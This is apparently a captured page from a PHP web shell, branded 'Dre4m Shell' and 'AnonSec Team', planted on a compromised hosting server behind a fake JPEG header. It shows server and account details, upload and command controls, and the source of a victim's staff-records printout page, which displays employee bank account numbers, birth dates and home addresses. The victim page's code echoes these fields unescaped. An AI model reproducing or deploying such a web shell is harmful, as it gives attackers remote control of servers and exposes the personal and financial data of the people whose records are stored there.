ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.137.198.239
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/consolidated/consolidated/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/consolidated/consolidated//searchprintout.php
<?php 
require_once('business logic/classes/users.php');
require_once('business logic/classes/add_per.php');

$per = new Per();
$user = new User();
if (!$user->get_session())
{
   header("location:myown_mainpage.php?you are not login");
}

$msg = $per->search($_SESSION['select1'], $_SESSION['parameter'] )
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>National Industrial Court of Nigeria...::...Search Result Printout</title>


<script language="javascript" type="text/javascript">
	function printPage(){
	window.print();	
	}
</script>
<style>
td{
	padding:0px 10px 0px 10px;	height:auto;
}
#searchresult{
	width:600px; margin:0px auto 0px auto;	
}
</style>
</head>

<body  onload ="printPage()">
<fieldset id="searchresult">
          <legend>Search Result of Staff Record<br />
            </legend>
          <form id="login" name="login" method="post" action="">
            <table width="600" border="0">
              
              <tr>
                <td width="135"><div align="right"><strong>File Number:</strong></div></td>
                <td width="465"><?php echo $msg[0];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Title:</strong></div></td>
                <td><?php echo $msg[1];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Surname:</strong></div></td>
                <td><?php echo $msg[2];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Other Names:</strong></div></td>
                <td><?php echo $msg[3];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Designation:</strong></div></td>
                <td><?php echo $msg[4];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Rank:</strong></div></td>
                <td><?php echo $msg[5];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Grade:</strong></div></td>
                <td><?php echo $msg[6];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Step: </strong></div></td>
                <td><?php echo $msg[7];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Bank Name:</strong></div></td>
                <td><?php echo $msg[8];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Bank Group</strong>: </div></td>
                <td><?php echo $msg[9];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Bank  Branch</strong></div></td>
                <td><?php echo $msg[10];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Account Number:</strong></div></td>
                <td><?php echo $msg[11];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Section</strong>:</div></td>
                <td><?php echo $msg[12];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Appointment Date</strong>:</div></td>
                <td><?php echo $msg[13];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Incremental Date</strong>:</div></td>
                <td><?php echo $msg[14];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Date of Birth:</strong></div></td>
                <td><?php echo $msg[15];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Home Address:</strong></div></td>
                <td><?php echo $msg[16];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Government Quater</strong>:</div></td>
                <td><?php echo $msg[17];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Employee type:</strong></div></td>
                <td><?php echo $msg[18];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Gender:</strong></div></td>
                <td><?php echo $msg[19];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Division</strong>:</div></td>
                <td><?php echo $msg[20];?></td>
              </tr>
              <tr>
                <td><div align="right"><strong>Staff Status</strong></div></td>
                <td><?php echo $msg[22];?></td>
              </tr>
            </table>
          </form>
        </fieldset>
</body>
</html>

Anon7 - 2022
AnonSec Team